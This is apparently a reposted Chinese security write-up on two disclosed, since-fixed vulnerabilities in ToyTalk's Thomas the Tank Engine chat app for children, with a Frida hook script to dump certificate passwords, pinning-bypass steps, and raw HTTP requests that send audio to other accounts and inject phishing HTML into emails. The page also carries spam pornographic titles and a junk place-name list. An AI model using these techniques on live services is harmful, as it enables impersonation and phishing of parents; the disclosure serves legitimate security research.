亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

發布時間:2022-01-18 15:27:22 來源:億速云 閱讀:153 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

漏洞發現背景

ToyTalk是一家由皮克斯前高管創建的人工智能玩具初創公司,它們設計的智能玩具具備視覺跟蹤、語音識別和網絡擴展功能,能讓兒童通過APP與玩具之間進行語音交流和行為反應識別,激發兒童與虛擬人物的談話能力,更好地實現與玩具之間的互動樂趣。

ToyTalk于2015年7月推出了一款名為“托馬斯和他的朋友們與你聊天 ”(Thomas & Friends Talk To You)”的付費APP,能讓兒童與知名卡通人物“小火車托馬斯”(Thomas the Tank Engine)互動聊天,它允許兒童在 8 次多多島故事之旅中,與托馬斯及其朋友培西、高登、亨利、詹姆斯、愛德華、托比、“胖總管”托芬海先生(Sir Topham Hatt)進行雙向對話。

為了測試ToyTalk玩具產品的安全性,以及接入家庭網絡環境帶來的安全風險,我決定對“托馬斯和他的朋友們與你聊天 ”APP進行一些分析研究。由于ToyTalk產品都使用相同的代碼庫,而且這款托馬斯對話APP很容易安裝和刪除,方便測試,也能有代表性。另外,ToyTalk的其它產品,如Hello Barbie(哈啰芭比)和Barbie Hello Dreamhouse (芭比夢幻之家)也可能存在相同漏洞。

漏洞情況

#漏洞1: - 缺乏身份驗證機制,攻擊者能很容易地假冒成一個兒童與托馬斯玩具進行對話

#漏洞2:- 可假冒support@toytalk.com或其它注冊用戶,發送注入HTML惡意釣魚鏈接的郵件

APP工作原理分析

“托馬斯和他的朋友們與你聊天 ”的APP啟動后,要求輸入提供一個家長的電子郵件地址,以確認使用APP提供的語音識別功能,當提交了電子郵件地址之后,APP進入運行界面。

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

剛開始,你可能會覺得該APP暴露的攻擊面非常有限,因為它需要提供與玩具對話的確認權限。

接下來,我要對該APP進行網絡瀏覽攔截分析。而且在分析中發現,該APP與其它應用不同,它提供了一個與客戶端進行認證的證書,也就是說,APP和它的WEB服務器之間也會存在一個相互認證的過程。基于此,我們要先來看看客戶端證書和相關密碼驗證的工作機制。

通過逆向后我們發現,以下兩個函數比較有意思:

public void setSslClientCertificate(String filename, String passphrase) {
        InputStream file = null;
        try {
            KeyStore store = KeyStore.getInstance("PKCS12");
            file = this.mContext.getResources().getAssets().open(filename);
            store.load(file, passphrase.toCharArray());
            this.mClientCertificate = KeyManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
            this.mClientCertificate.init(store, new char[0]);
        } catch (Exception e) {
            Log.OMG(e);
         } finally {
            Utils.close(file);
        }
    }
public void setSslCaCertificate(String filename, String passphrase) {

        InputStream file = null;
        try {
            KeyStore store = KeyStore.getInstance("BKS");
            file = this.mContext.getResources().getAssets().open(filename);
            store.load(file, passphrase.toCharArray());
            this.mCaCertificate = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
            this.mCaCertificate.init(store);
        } catch (Exception e) {
            Log.OMG(e);
        } finally {
            Utils.close(file);
        }
    }

之后,我沒有繼續逆向尋找密碼傳入函數,而是使用以下具備frida hook功能,可以轉儲密碼和文件名的Python腳本來深入:

import frida
import sys
def on_message(message, data):
    print message
device = frida.get_device_manager().enumerate_devices()[-1]
pid = device.spawn(["com.toytalk.thomas"])
print (pid)
session = device.attach(pid)
ss = '''
 Java.perform(function () {
    var MyClass = Java.use("com.toytalk.library.HttpRequester");
    MyClass.setSslCaCertificate.overload("java.lang.String","java.lang.String").implementation = function(a,b){
        send(a);
        send(b);
        return this.setSslCaCertificate.overload("java.lang.String","java.lang.String").call(this,a,b);
    }
    MyClass.setSslClientCertificate.overload("java.lang.String","java.lang.String").implementation = function(a,b){
        send(a);
        send(b);
        return this.setSslCaCertificate.overload("java.lang.String","java.lang.String").call(this,a,b);
    }
})
'''    
script = session.create_script(ss)
script.load()
script.on('message', on_message)
device.resume(pid)
#session.detach()
sys.stdin.read()

高興的是,可以從apk中提取出正確的認證證書文件,并能用于執行中間人攻擊(MITM),而有趣的是,文件toytalk.12沒有使用任何密碼保護。

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

現在,我們就可以使用客戶端證書了,但仍需繞過證書鎖定(Certificate Pinning)。雖然有幾種方式可以實現,但最簡單的方法是從apk中刪除證書,重建程序然后重新安裝。把客戶端證書導入Burpsuite,實現了證書鎖定功能禁用,之后,我們就可以進入大多數APP程序測試的第一步-流量攔截。

漏洞分析

漏洞1 - 缺乏身份驗證機制

該APP程序還提供了一個不太明顯的功能,就是其捕獲的對話音頻文件會存儲在線,可備家長后續進行重放收聽,該功能與用于之前授權同意的電子郵箱地址綁定,雖然該郵箱地址只在父母執行密碼重置時才用得到。

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

當"speak" 按鈕被按下時,APP會把捕獲的音頻文件以以下POST請求方式發送到遠端Web服務器中:

https://asr.2.toytalk.com/v3/asr/0673bcb8-367a-44bc-aed5-8c21fb7086af/thomas/1502714441?account=<removed>&play_session=<removed>&client=com.toytalk.thomas&locale=en_GB&device_id=<removed>&device_model=<removed>&os=Android&os_version=5.1&intelligence=0%2F1%2Fc%2F01cd49694727bbcf1c0cefd7a4a24f2e_intelligence.tiz&ruleset_id=rs_b92dd8d9-cba9-4a76-a56b-51fc3d15f8f5&rate=16000 

雖然其中的發送內容涉及很多變量值,但通過把當前用戶ID更改為其它用戶ID后,就能把音頻文件發送到指定的用戶賬戶名下,這將會允許一些惡意攻擊者向兒童父母發送一些淫穢音頻信息。

在這種情況下,雖然用戶ID是一個隨機的全局惟一標識符(GUID),但我們可以根據郵箱地址等已知線索來發現一些有效的用戶ID信息。

另外,運行ToyTalk代碼庫的"strings"命令后,也有一點蛛絲馬跡可循:

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

所以,根據上圖信息,一旦客戶端證書被安裝到瀏覽器中后,通過訪問地址:

https://api.toytalk.com/v3/account/<email address>

就能下載到一個包含用戶ID的文件。有用戶ID信息在手,就能更改POST請求中的ID信息,將對話音頻發送到任何注冊了該APP的郵箱地址中去。該漏洞可以通過要求提供正確的設備ID以及關聯用戶ID來修復解決。我們還沒測試設備ID是否能以其它方法獲取,但要向某個用戶賬號添加一個設備ID,貌似需要訪問到關聯的郵箱地址才行。

漏洞報送進程

2017.8.14 -  向ToyTalk報告漏洞

2017.11.16 - 被分類為一般漏洞并被初次修復,變為closed狀態

2017.11.29 - ToyTalk再次測試發現漏洞仍然存在,并重置為reopen狀態

2017.12.8  - 完全修復漏洞

2017.12.18 - 漏洞賞金發放并關閉漏洞報告

漏洞2 - 可向ToyTalk郵件中注入惡意HTML框架

在以上漏洞1提交過后沒幾天,我的朋友建議我可以研究一下ToyTalk的郵箱注入機制。在使用諸如“Thomas And You”等APP應用注冊設備時,它會將一封電子郵件發送到用戶提供的郵箱地址中, 由于該電子郵件中包含了用戶信息(設備名稱),如果攻擊者利用漏洞1方法獲取到受害者的用戶ID之后,那么,接下來可以修改電子郵件HTML中包含的設備名稱,以該受害者用戶ID為可信發件人,向其它受害者發送惡意釣魚郵件,或任意更改過的郵件內容。

為了向受害者發送釣魚郵件,攻擊者先要用郵箱在該APP上進行注冊,利用該注冊郵箱地址,再用漏洞1方法獲取到受害者用戶ID,用以后續進行釣魚郵件發送。

也即,首先,攻擊者用受害者注冊過的郵箱地址,執行以下請求,以獲取到相應的受害者用戶ID:

GET /v3/account/<email address> HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.1; ONEPLUS A3003 Build/NMF26F)
Host: api.2.toytalk.com
Connection: close

然后,再以該用戶ID為可信發件人,用以下POST方式,向其它受害者發送包含釣魚鏈接的惡意郵件內容:

POST /v3/account/<accountid>/email/consent?device_id=asdf&device_name=TEST%20DEVICE"</br>%20<a%20href="http://google.com">click%20here</a>&application=Thomas+And+You&always HTTP/1.1
Content-Type: text/plain
Content-Length: 0
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.1; ONEPLUS A3003 Build/NMF26F)
Host: api.2.toytalk.com
Connection: close

以上只是一個簡單的PoC示例,它利用<a>標簽將HTML鏈接注入到郵件內容框架中,但如果花時間調整,也可以精心制作出一個更具迷惑性的釣魚郵件來,例如,某位家長可以假冒support@toytalk.com郵件來欺騙其它家長的用戶名密碼信息。下圖就是我們假冒toytalk官方發送的包含釣魚鏈接的郵件內容:

發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析

漏洞報送進程:

2017.12.4 - 提交漏洞

2017.12.12 - 官方致謝

2017.12.18 - 官方修復漏洞

2017.12.18 - 發布賞金并關閉漏洞報告

整體來說,兩個漏洞的利用方式都存在一定的受限條件,但也側面說明了大量APP在開發過程中忽視了全面的安全考慮。

以上就是發現“小火車托馬斯”智能玩具APP聊天應用漏洞的示例分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

app
AI

乌兰察布市| 红河县| 宜阳县| 香格里拉县| 探索| 云林县| 建水县| 平顺县| 商洛市| 衡山县| 白水县| 博兴县| 剑河县| 读书| 垦利县| 元朗区| 杭锦后旗| 浠水县| 三台县| 水城县| 玉溪市| 封开县| 大竹县| 定陶县| 双鸭山市| 岢岚县| 司法| 鲁甸县| 孟州市| 嫩江县| 任丘市| 陇南市| 肥东县| 墨竹工卡县| 开阳县| 安图县| 康马县| 电白县| 松桃| 济阳县| 永胜县|